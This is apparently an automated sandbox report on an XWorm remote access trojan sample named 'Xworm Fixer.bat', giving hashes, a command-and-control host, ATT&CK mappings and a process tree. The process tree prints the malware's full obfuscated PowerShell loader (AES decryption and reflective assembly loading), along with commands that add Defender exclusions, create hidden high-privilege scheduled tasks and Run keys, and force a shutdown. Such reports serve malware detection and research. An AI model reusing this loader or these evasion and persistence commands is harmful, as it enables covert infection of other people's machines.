xworm | 74cdc51bc00b8f596fb764469b16ec2edb336cf9f151697ff984a5081c3204d6

Analysis

max time kernel
72s
max time network
73s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
07-09-2024 16:21

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Xworm Fixer.bat
Size

442KB
MD5

ccf46201786b2facd7b19ea6129944da
SHA1

25e51f0e98977de48e111773058cc1b70ced0892
SHA256

74cdc51bc00b8f596fb764469b16ec2edb336cf9f151697ff984a5081c3204d6
SHA512

43a92ed1caf5a517e4e1506127b96b07c75458701e4d0b0556fc79694866fb27089ed919688c7ff68c7c2a87b51ef2e635d85bfa8a5aa860f132bfb1fbe13675
SSDEEP

6144:7iCje5mpo5kEu3ojrKYMwoocilcJohGUMJb0YXZyDC3ntd0FqT/G+PYDKhJaltT7:Xi5mpJEu3mkR4LMxZye3ntqFKFPTjWZ

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

manufacturer-rank.gl.at.ply.gg:60383

Attributes

Install_directory
%AppData%
install_file
USB.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000200000002a9e8-55.dat	family_xworm
behavioral1/memory/3176-63-0x00000000008A0000-0x0000000000914000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4144	powershell.exe
1532	powershell.exe
2812	powershell.exe
3140	powershell.exe
2224	powershell.exe
3716	powershell.exe
2544	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk	PNG.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk	PNG.exe

Executes dropped EXE 2 IoCs

pid	Process
3176	PNG.exe
1540	System User

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000\Software\Microsoft\Windows\CurrentVersion\Run\System User = "C:\\Users\\Admin\\AppData\\Roaming\\System User"	PNG.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "142"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1248	schtasks.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
4144	powershell.exe
4144	powershell.exe
2812	powershell.exe
2812	powershell.exe
1532	powershell.exe
1532	powershell.exe
3140	powershell.exe
3140	powershell.exe
2224	powershell.exe
2224	powershell.exe
3716	powershell.exe
3716	powershell.exe
2544	powershell.exe
2544	powershell.exe
3176	PNG.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4144	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeIncreaseQuotaPrivilege	2812	powershell.exe
Token: SeSecurityPrivilege	2812	powershell.exe
Token: SeTakeOwnershipPrivilege	2812	powershell.exe
Token: SeLoadDriverPrivilege	2812	powershell.exe
Token: SeSystemProfilePrivilege	2812	powershell.exe
Token: SeSystemtimePrivilege	2812	powershell.exe
Token: SeProfSingleProcessPrivilege	2812	powershell.exe
Token: SeIncBasePriorityPrivilege	2812	powershell.exe
Token: SeCreatePagefilePrivilege	2812	powershell.exe
Token: SeBackupPrivilege	2812	powershell.exe
Token: SeRestorePrivilege	2812	powershell.exe
Token: SeShutdownPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeSystemEnvironmentPrivilege	2812	powershell.exe
Token: SeRemoteShutdownPrivilege	2812	powershell.exe
Token: SeUndockPrivilege	2812	powershell.exe
Token: SeManageVolumePrivilege	2812	powershell.exe
Token: 33	2812	powershell.exe
Token: 34	2812	powershell.exe
Token: 35	2812	powershell.exe
Token: 36	2812	powershell.exe
Token: SeIncreaseQuotaPrivilege	2812	powershell.exe
Token: SeSecurityPrivilege	2812	powershell.exe
Token: SeTakeOwnershipPrivilege	2812	powershell.exe
Token: SeLoadDriverPrivilege	2812	powershell.exe
Token: SeSystemProfilePrivilege	2812	powershell.exe
Token: SeSystemtimePrivilege	2812	powershell.exe
Token: SeProfSingleProcessPrivilege	2812	powershell.exe
Token: SeIncBasePriorityPrivilege	2812	powershell.exe
Token: SeCreatePagefilePrivilege	2812	powershell.exe
Token: SeBackupPrivilege	2812	powershell.exe
Token: SeRestorePrivilege	2812	powershell.exe
Token: SeShutdownPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeSystemEnvironmentPrivilege	2812	powershell.exe
Token: SeRemoteShutdownPrivilege	2812	powershell.exe
Token: SeUndockPrivilege	2812	powershell.exe
Token: SeManageVolumePrivilege	2812	powershell.exe
Token: 33	2812	powershell.exe
Token: 34	2812	powershell.exe
Token: 35	2812	powershell.exe
Token: 36	2812	powershell.exe
Token: SeIncreaseQuotaPrivilege	2812	powershell.exe
Token: SeSecurityPrivilege	2812	powershell.exe
Token: SeTakeOwnershipPrivilege	2812	powershell.exe
Token: SeLoadDriverPrivilege	2812	powershell.exe
Token: SeSystemProfilePrivilege	2812	powershell.exe
Token: SeSystemtimePrivilege	2812	powershell.exe
Token: SeProfSingleProcessPrivilege	2812	powershell.exe
Token: SeIncBasePriorityPrivilege	2812	powershell.exe
Token: SeCreatePagefilePrivilege	2812	powershell.exe
Token: SeBackupPrivilege	2812	powershell.exe
Token: SeRestorePrivilege	2812	powershell.exe
Token: SeShutdownPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeSystemEnvironmentPrivilege	2812	powershell.exe
Token: SeRemoteShutdownPrivilege	2812	powershell.exe
Token: SeUndockPrivilege	2812	powershell.exe
Token: SeManageVolumePrivilege	2812	powershell.exe
Token: 33	2812	powershell.exe
Token: 34	2812	powershell.exe
Token: 35	2812	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3176	PNG.exe
3504	LogonUI.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 860 wrote to memory of 4144	860	cmd.exe	82
PID 860 wrote to memory of 4144	860	cmd.exe	82
PID 4144 wrote to memory of 2812	4144	powershell.exe	84
PID 4144 wrote to memory of 2812	4144	powershell.exe	84
PID 4144 wrote to memory of 3332	4144	powershell.exe	86
PID 4144 wrote to memory of 3332	4144	powershell.exe	86
PID 3332 wrote to memory of 1396	3332	WScript.exe	87
PID 3332 wrote to memory of 1396	3332	WScript.exe	87
PID 1396 wrote to memory of 1532	1396	cmd.exe	89
PID 1396 wrote to memory of 1532	1396	cmd.exe	89
PID 1532 wrote to memory of 3176	1532	powershell.exe	90
PID 1532 wrote to memory of 3176	1532	powershell.exe	90
PID 3176 wrote to memory of 3140	3176	PNG.exe	91
PID 3176 wrote to memory of 3140	3176	PNG.exe	91
PID 3176 wrote to memory of 2224	3176	PNG.exe	93
PID 3176 wrote to memory of 2224	3176	PNG.exe	93
PID 3176 wrote to memory of 3716	3176	PNG.exe	95
PID 3176 wrote to memory of 3716	3176	PNG.exe	95
PID 3176 wrote to memory of 2544	3176	PNG.exe	97
PID 3176 wrote to memory of 2544	3176	PNG.exe	97
PID 3176 wrote to memory of 1248	3176	PNG.exe	99
PID 3176 wrote to memory of 1248	3176	PNG.exe	99
PID 3176 wrote to memory of 656	3176	PNG.exe	102
PID 3176 wrote to memory of 656	3176	PNG.exe	102

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Xworm Fixer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('o1j2aeFxATS/LMnhyTtPZh88JKeZO7a/GlRllyMvGKg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OkQnfLRJOt+ggCAP/xzZGA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QmUAh=New-Object System.IO.MemoryStream(,$param_var); $PKXDP=New-Object System.IO.MemoryStream; $nocnw=New-Object System.IO.Compression.GZipStream($QmUAh, [IO.Compression.CompressionMode]::Decompress); $nocnw.CopyTo($PKXDP); $nocnw.Dispose(); $QmUAh.Dispose(); $PKXDP.Dispose(); $PKXDP.ToArray();}function execute_function($param_var,$param2_var){ $RADPl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qkeSZ=$RADPl.EntryPoint; $qkeSZ.Invoke($null, $param2_var);}$JTvsg = 'C:\Users\Admin\AppData\Local\Temp\Xworm Fixer.bat';$host.UI.RawUI.WindowTitle = $JTvsg;$zlCYh=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JTvsg).Split([Environment]::NewLine);foreach ($GJRIG in $zlCYh) { if ($GJRIG.StartsWith(':: ')) { $PnLCB=$GJRIG.Substring(3); break; }}$payloads_var=[string[]]$PnLCB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_496_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_496.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2812
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_496.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3332
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_496.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1396
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('o1j2aeFxATS/LMnhyTtPZh88JKeZO7a/GlRllyMvGKg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OkQnfLRJOt+ggCAP/xzZGA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $QmUAh=New-Object System.IO.MemoryStream(,$param_var); $PKXDP=New-Object System.IO.MemoryStream; $nocnw=New-Object System.IO.Compression.GZipStream($QmUAh, [IO.Compression.CompressionMode]::Decompress); $nocnw.CopyTo($PKXDP); $nocnw.Dispose(); $QmUAh.Dispose(); $PKXDP.Dispose(); $PKXDP.ToArray();}function execute_function($param_var,$param2_var){ $RADPl=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qkeSZ=$RADPl.EntryPoint; $qkeSZ.Invoke($null, $param2_var);}$JTvsg = 'C:\Users\Admin\AppData\Roaming\startup_str_496.bat';$host.UI.RawUI.WindowTitle = $JTvsg;$zlCYh=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JTvsg).Split([Environment]::NewLine);foreach ($GJRIG in $zlCYh) { if ($GJRIG.StartsWith(':: ')) { $PnLCB=$GJRIG.Substring(3); break; }}$payloads_var=[string[]]$PnLCB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1532
      - C:\Users\Admin\AppData\Local\Temp\PNG.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PNG.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\PNG.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3140
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PNG.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3716
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System User'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2544
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\Admin\AppData\Roaming\System User"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1248
        
        C:\Windows\SYSTEM32\shutdown.exe
        
        shutdown.exe /f /s /t 0
        7⤵
        
        PID:656

C:\Users\Admin\AppData\Roaming\System User
"C:\Users\Admin\AppData\Roaming\System User"
1⤵
- Executes dropped EXE
PID:1540

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3a25055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:3504

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
c24caab1947646fcc49d6158d78a56f5

SHA1
aa2cd00401eb273991f2d6fdc739d473ff6e8319

SHA256
0696315ad3df3edd5426276c265bd13d8bd2a0d101548bcaedd82e2aebde655a

SHA512
35e1d214dfb4c7f078496e3e303aea152aa48f9db5b9aa188aeb82b541582ed77f60bfe8712836232b5aa31d3645edfc79b42c8f90e92e06778f21aa44971bff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
824da05d0f31c23ab953467d7a3812f7

SHA1
48349c5986cb56777bf77e747eafbc2f87dfc2c1

SHA256
6d266b3c94b03d8ed8648328f707c58177b2075c963aff4cbe6576d93df518b8

SHA512
5c35ada146f86ebaefc96d82f7176f7ccabf179a5297b04fb7f56a88cb6a8a1b1bb159b04599cf8f581f49a08137530aa3cc8a1e5c67a383880c6998e84c5367

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
069a5afc0d3844d09974a80aa9ecfb36

SHA1
a2f83dc0acd091044e65eb9051fc18bca4c0f35f

SHA256
79c7b69021195d10ef1c425831562d4772e11079210542d86aad6e00c8561ede

SHA512
24b5317d67773ed96a3ca7e502aeaadf367290c25f7482c19811182d877430ef8e225922f7c0c89bb767015972130ec97268cbed367d24d3e663d034c9ca3648

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e07eea85a8893f23fb814cf4b3ed974c

SHA1
8a8125b2890bbddbfc3531d0ee4393dbbf5936fe

SHA256
83387ce468d717a7b4ba238af2273da873b731a13cc35604f775a31fa0ac70ea

SHA512
9d4808d8a261005391388b85da79e4c5396bdded6e7e5ce3a3a23e7359d1aa1fb983b4324f97e0afec6e8ed9d898322ca258dd7cda654456dd7e84c9cbd509df

Download Submit
C:\Users\Admin\AppData\Local\Temp\PNG.exe

Filesize
437KB

MD5
3c21cd756c5f0ae7ac13dd21b086e53b

SHA1
4216831c140c537e19c9f66e845583f2231e2435

SHA256
aab3729408b3b167f77a291abdd6becd043066521880b911c5e29115cdebea04

SHA512
42d717e11b61fefc29e64d3b6a17eb97f7f67a8fde4a9f01f0f92ce647ba4d19e2e2aa68c9964023985678ec15427953d543f78fa4ee037971901244ba5da77f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1wnllpre.hys.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_496.bat

Filesize
442KB

MD5
ccf46201786b2facd7b19ea6129944da

SHA1
25e51f0e98977de48e111773058cc1b70ced0892

SHA256
74cdc51bc00b8f596fb764469b16ec2edb336cf9f151697ff984a5081c3204d6

SHA512
43a92ed1caf5a517e4e1506127b96b07c75458701e4d0b0556fc79694866fb27089ed919688c7ff68c7c2a87b51ef2e635d85bfa8a5aa860f132bfb1fbe13675

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_496.vbs

Filesize
115B

MD5
e520a1271529ce39773dac176bbdf0fc

SHA1
09a1ba7f79fb7e974a2aea036c6a08d4c2e51f5b

SHA256
446858539d1704379372857fd248a9e1387d5e253a1528f1d961b16aa137dcf4

SHA512
379478c2a0d8a7174ace7ee4459bd0f47e640e58212f082c25b997aab06e7f46316125a20a7a59828d95fce46a35dd4579992896b8cf52ef7f9501d60a9280b3

Download Submit
memory/1532-48-0x0000019530DE0000-0x0000019530E0E000-memory.dmp

Filesize
184KB

Download
memory/2812-16-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

Filesize
10.8MB

Download
memory/2812-30-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

Filesize
10.8MB

Download
memory/2812-27-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

Filesize
10.8MB

Download
memory/2812-26-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

Filesize
10.8MB

Download
memory/2812-25-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

Filesize
10.8MB

Download
memory/3176-63-0x00000000008A0000-0x0000000000914000-memory.dmp

Filesize
464KB

Download
memory/3176-111-0x00000000010E0000-0x0000000001190000-memory.dmp

Filesize
704KB

Download
memory/4144-13-0x0000023CF3C90000-0x0000023CF3C98000-memory.dmp

Filesize
32KB

Download
memory/4144-49-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

Filesize
10.8MB

Download
memory/4144-14-0x0000023CF3F10000-0x0000023CF3F66000-memory.dmp

Filesize
344KB

Download
memory/4144-0-0x00007FFDC8A73000-0x00007FFDC8A75000-memory.dmp

Filesize
8KB

Download
memory/4144-12-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

Filesize
10.8MB

Download
memory/4144-11-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

Filesize
10.8MB

Download
memory/4144-10-0x00007FFDC8A70000-0x00007FFDC9532000-memory.dmp

Filesize
10.8MB

Download
memory/4144-9-0x0000023CF3C60000-0x0000023CF3C82000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing

Errors

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads